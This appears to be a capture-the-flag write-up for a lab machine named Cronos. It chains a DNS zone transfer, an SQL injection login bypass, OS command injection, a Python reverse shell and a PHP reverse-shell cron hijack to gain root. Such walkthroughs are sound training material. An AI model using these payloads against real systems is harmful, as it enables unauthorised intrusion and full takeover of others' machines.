Service Enumeration -H -t all
We can perform a DNS zone transfer, guessing that the domain is cronos.htb:
dig axfr @ cronos.htb
Here, we uncover some subdomains for Let's add them to our /etc/hosts file.
Now, going to www.cronos.htb and admin.cronos.htb yields a valid webpage.


The admin.cronos.htb login page is vulnerable to SQL injection. Using the payload:
username=' or 1=1;#&password=
We can bypass the authentication. Note that this does not work on the password field.
We get access to the following tool:
If we examine the POST request, we see that ping -c 1 is sent as the command parameter. It is possible that the server is not sanitizing the input and reflecting the command parameter into the OS command.
Indeed, changing to -c 2 changes the command executed!
We now have an RCE vulnerability. Executing the which python command shows that Python is installed on the server.
We can use a Python reverse shell payload:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
After URL encoding, we can edit the command parameter:
On our Netcat listener, we receive the reverse shell

Privilege Escalation

We can use LinPEAS to enumerate.
We find the following cron job that runs every minute:
The script run is a PHP script:
We can change this to our custom PHP payload:
<?php $sock=fsockopen("",4242); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
The next time the cron job is run, we obtain a root shell on our listener.